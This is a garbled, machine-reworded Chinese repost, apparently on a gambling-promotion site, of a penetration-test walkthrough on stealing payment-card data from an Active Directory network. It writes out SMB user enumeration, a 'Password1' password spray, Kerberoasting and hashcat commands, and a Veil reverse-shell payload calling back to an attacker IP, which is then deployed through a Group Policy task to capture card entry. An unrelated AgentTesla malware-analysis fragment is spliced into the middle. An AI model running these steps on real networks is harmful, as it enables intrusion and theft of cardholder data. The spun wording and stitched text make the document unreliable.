剥丝抽茧,层层破解!看我怎样一步步绕过防火墙直至猎取你的付出卡信息 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

剥丝抽茧,层层破解!看我怎样一步步绕过防火墙直至猎取你的付出卡信息

申博_安全防护 申博 102次浏览 已收录 0个评论

媒介

此文章引见了以盗取数据为目标的完全渗入历程,作者起首经由过程enum4linux对域状况举行信息收集,整理出用户名字典后,然后暴力破解SMB。取得了一个域账号权限后,再运用 Kerberoasting手艺猎取到域治理员权限,末了经由过程域治理员下发组战略的体式格局猎取到包罗目标数据体系的权限。

一步步绕过Windows域中的防火墙猎取付出卡敏感数据

本文细致引见了怎样绕过防火墙以猎取对持卡人数据状况(cardholder data environment,CDE)的接见权限,并终究提取付出卡数据。

若是你要存储、传输或处置惩罚付出卡数据,那末就必须要确保付出卡数据在你的内部收集中连结高度平安,内部收集状况必需相符PCI数据平安范例(PCI-DSS)。固然,若是你的内部收集举行了分段,则没必要让全部内部收集都相符PCI范例,只需让分段出的处置惩罚付出卡数据的状况相符PCI数据平安范例。而分段,即断绝出CDE,一般是运用防火墙来完成的。

在以下所解说的示例中,一切敏感信息都做过修正,本文我们所举行渗入测试的付出卡公司,具有很重大的内部收集,一切IP都在10.0.0.0/8局限内。不外,为了珍爱付出卡的数据平安,它们的IP被特地举行了分段,和其他收集断绝,数据位于零丁的192.168.0.0/16局限内。

CDE重要由接收德律风定单的呼唤中间操纵员构成,并在外部操纵的web运用程序上以表单的情势输入付款细节。

由于这是一次内部渗入测试,因而我们衔接到公司内部办公收集的局限为10.0.0.0/8。早先,运用ping和端口扫描从这个收集地位扫描CDE没有取得任何效果。

虽然ping扫描与运转ping敕令基础雷同,然则nmap可以或许一次扫描全部局限。第二个敕令输出中的“hosts up”与我们给nmap供应的-Pn参数有关,该参数通知它不要起首ping,因而nmap会将局限内的一切主机申报为“up”,纵然它们可以或许不是。

因而,除非有防火墙划定规矩绕过破绽,或许我们可以或许猜到防火墙的弱暗码,不然直接扫描不太可以或许能取得想要的效果。因而,猎取付出卡敏感数据的第一步是经由过程取得域治理员权限来集中精神掌握Active Directory。

取得域治理员权限

有许多要领可以或许完成这个要求,好比我之前宣布的《从外部Active Directory猎取域治理员权限》。

而在本文的示例中,我们会接纳一种新的要领,即运用kerberoast来掌握域。简朴直白的说Kerberoast进击,就是进击者为了猎取目标效劳的接见权限,而想法破解Kerberos效劳单子并重写它们的历程。这是红队傍边异常罕见的一种进击手段,由于它不须要与效劳目标效劳举行任何交互,而且可以或许运用正当的运动目次接见来请乞降导出可以或许离线破解的效劳单子,以猎取到终究的明文暗码。之以是涌现这类状况,是由于效劳单子运用效劳帐户的散列(NTLM)举行加密,以是任何域用户都可以或许从效劳转储散列,而无需将shell引入运转该效劳的体系中。

为此,我们须要在域中找一个未受权的进击点,来最先取得域治理员权限。进击Active Directory的第一步一般触及取得任何级别的任何用户帐户的接见权限。只需它能以某种体式格局对域掌握器举行身份考证,就可以或许。在Windows状况中,纵然账户没有权限在域掌握器上现实实行任何操纵,他们都应该可以或许运用域掌握器举行身份考证。在Windows默许平安级别下,纵然是权限最低的帐户在登录时也须要考证暗码是不是准确。

在客户的内网状况中,域掌握器许可竖立空会话。在本文的示例中,我们的域掌握器是10.0.12.100, “PETER”。这意味着,我们可以或许运用enum4linux等东西罗列用户列表,显现域中每一个用户的用户名:

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

enum4linux是Kali Linux自带的一款信息收集东西。它可以或许收集Windows体系的大批信息,如用户名列表、主机列表、同享列表、暗码战略信息、事情组和成员信息、主机信息、打印机信息等等。该东西主如果针对Windows NT/2000/XP/2003,在Windows 7/10体系,局部功用受限。

如今我们就有了一个用户列表,然后将该表剖析成一个可用的花样:

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

出于解说目标,以上花样内容不是很简约。若是你情愿,可以或许运用awk,grep,sed或更少字符的Perl来完成花样的简朴化。然则,若是你正在举行渗入测试,发起你运用任何有用的要领,并将重要精神放在终极目标上,没有必要纠结情势。若是我要编写一个长期运用的剧本,我可以或许会对它举行一些优化,然则为了举行测试,我倾向于纰谬花样做优化。

在本文的示例中,由于现实测试的收集重大,活泼用户凌驾25000人。为了轻易测试,我们只选了局部用户的数据。

如今我们已将用户列表剖析为文本文件,然后可以或许运用CrackMapExec等东西预测暗码。在本文的示例中,我们将预测是不是有任何用户的暗码是“Password1”,该暗码虽然简朴,但却相符Active Directory的默许复杂性划定规矩,由于它包罗四种字符范例中的三种(大写,小写和数字)。

$ cme smb 10.0.12.100 -u users.txt -p Password1

果然不出所料,预测胜利。

请注意,若是我们想继承预测并找到一切帐户,就须要指定参数–continue-on-success。

此时,我们已胜利掌握了一个帐户。如今我们可以或许查询Active Directory并取得效劳帐户列表。效劳帐户是一种代表效劳的帐户,就像Microsoft SQL Server如许的效劳。这些效劳运转时,须要在以某种帐户身份存在于体系。荣幸的是, Active Directory的Kerberos身份考证体系可用于供应接见权限,因而Active Directory供应“效劳单子”以许可用户对其举行身份考证。 Kerberos身份考证不在本文的议论局限以内,若是你想相识更多信息,请点此。

经由过程从域掌握器要求Kerberos效劳帐户列表,我们还能取得每一个帐户的“效劳单子”。此效劳单子是运用效劳帐户的暗码所加密。因而,若是我们可以或许破解它,将可以或许取得高权限。 Impacket东西集可用于要求以下内容:

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

正如我们所看到的,个中一个效劳帐户是Domain Admins的成员,这意味着我们取得了高权限。

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

在运转hashcat举行暗码破解后,我们发明以下的明文暗码。

再次运用CrackMapExec,确认这是一个现实存在的运动帐户。

警惕利用Office漏洞传播商业间谍软件AgentTesla

背景概述 AgentTesla原本是一款在2014年发布的简单的键盘记录器,近年来其开发团队为其不断增加了许多新功能,并进行出售。AgentTesla现已成为一个商业化的间谍软件,可通过控制端生成满足功能需求的木马程序。 AgentTesla最常见的传播方式是钓鱼邮件,邮件附件中通常会携带恶意文档,通过宏或漏洞利用下载运行恶意程序。近日,深信服安全团队采集到利用CVE-2017-11882传播AgentTesla窃取信息的恶意样本,并对其攻击过程进行了详细分析。 详细分析 CVE-2017-11882 1.使用工具监控文件行为,查看到运行文档后系统拉起了eqnedt32.exe进程,并且通过抓包捕获到下载EXE文件的流量,由此判断是利用CVE-2017-11882执行恶意代码: 2.通过附加调试器,在Kernel32!WinExec下断点,查看寄存器值,找到运行了”C:\Users\root\AppData\Roaming\Adobe.exe”的命令,与捕获到的流量信息相结合判断,恶意代码应是下载文件保存到本地然后运行,推断使用了URLDownloadToFile相关API: 3.附加调试器对网络相关API下断调试,但程序并没有断下,于是在eqnedt32.exe造成溢出的函数处下断,单步调试到ret覆盖的返回地址,执行恶意代码: 4.恶意代码先对内存进行解密操作,图中是解密前后对比,可以直观

$ cme smb 10.0.12.100 -u redrum -p ' 1!

我们如今就可以或许伪装成Pwn3d !,猎取域掌握权限了。

剥丝抽茧,层层破解!看我怎样一步步绕过防火墙直至猎取你的付出卡信息

取得域治理员权限后,怎样取得付出卡数据?

不幸的是,在对目标进击测试后,我们发明呼唤中间署理在CDE顶用来接收德律风定单的盘算机位于雷同的Active Directory域中。虽然我们没法直接衔接到这些装备,但由于如今我们已可以或许猎取域掌握权限了,可以或许强行让域掌握器与我们举行对话。为此,我们须要深切相识组战略对象(GPO),在GPO中,你可以或许运用组战略为用户和盘算机组界说用户和盘算机设置装备摆设。经由过程运用组战略Microsoft Management Console (MMC) 治理单元,你可以或许为特定的用户和盘算机组建立特定的桌面设置装备摆设。此时,你建立的组战略设置包罗在组战略对象中,后者进而与选定的 Active Directory 容器,如站点、域或构造单元 (OU))联系关系。不外在本文中,你只须要晓得GPO许可在全局或用户级别上掌握域中的盘算机既可。

运用GPO的“立即义务”选项,我们可以或许建立一个将在呼唤中间运转的剧本,并衔接回我们的装备,让我们完成掌握。以下是详细步骤(7步):

1.天生有用载荷,我们在示例中运用的是Veil Evasion,Veil-Evasion是一种天生有用载荷可实行文件的东西,可绕过罕见的防病毒解决方案。由于我们的IP地点是10.0.12.1,以是我们将把有用载荷指向这个地点,从而举行回连。

$ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell

2.运用我们从kerberoasting取得的凭证,经由过程远程桌面协定(RDP)登录到域掌握器。

3.在Active Directory中查找CDE,依据我们对测试目标的相识,我们晓得呼唤中间署理在2楼事情。以是,我们重点存眷带有floor 2. 字眼的文件。

4.将我们从Veil制造的剧本放入文件夹中,并在域掌握器上同享该剧本,设置同享和目次上的权限,以许可一切域用户读取。

5.在GPO中,我们在以下级别建立了一个组战略。

剥丝抽茧,层层破解!看我怎样一步步绕过防火墙直至猎取你的付出卡信息

6.在编纂此新GPO时,找到“计划义务”选项,并建立新的“立即义务”:

剥丝抽茧,层层破解!看我怎样一步步绕过防火墙直至猎取你的付出卡信息

7. 建立指向同享中歹意剧本的义务,同时在common下设置Run in logged-on user’s security context。

剥丝抽茧,层层破解!看我怎样一步步绕过防火墙直至猎取你的付出卡信息

经由冗长地守候(90分钟),我看到了以下内容的天生。

运转敕令截取屏幕截图,这些天生的内容恰是呼唤中间署理输入的付出卡数据!

此时,渗入测试的目标就已顺利完成。剥丝抽茧,层层破解!经由过程一步步绕过防火墙,终究猎取了付出卡信息。

若是我们检察会话列表,可以或许看到原始IP来自192.168.0.0/16 CDE局限。

在现实测试中,全部二楼的装备基础都返回了shell,我们末了取得了约莫60-100个Meterpreter。

请注意,以上截图中的样本是Amazon,这与我议论的测试目标无关。在实在的测试中,我们会设置了一个剧本以便在衔接shell时捕捉屏幕截图(经由过程autorunscript),然后就可以或许专注于更风趣的会话,比方那些付出卡数据举行输入时的历程。

另有其他猎取截图的敕令,比方在Meterpreter中运用use espia以及metasploit的post/windows/gather/screen_spy。

有一些要领可以或许经由过程编程完成GPO,我还没有尝试过,比方PowerView中的New-GPOImmediateTask。

减缓步伐

减缓这类进击的最好要领,就是一直在被断绝的Active Directory域中运转CDE,详细道理,请点此相识。别的,为了保险起见,你可以或许设置强暗码。固然,更深度防备步伐是完全封闭空会话,检测是不是有用户一次性来要求一切效劳单子,若是有人这么做,则对其举行符号追踪。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明剥丝抽茧,层层破解!看我怎样一步步绕过防火墙直至猎取你的付出卡信息
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址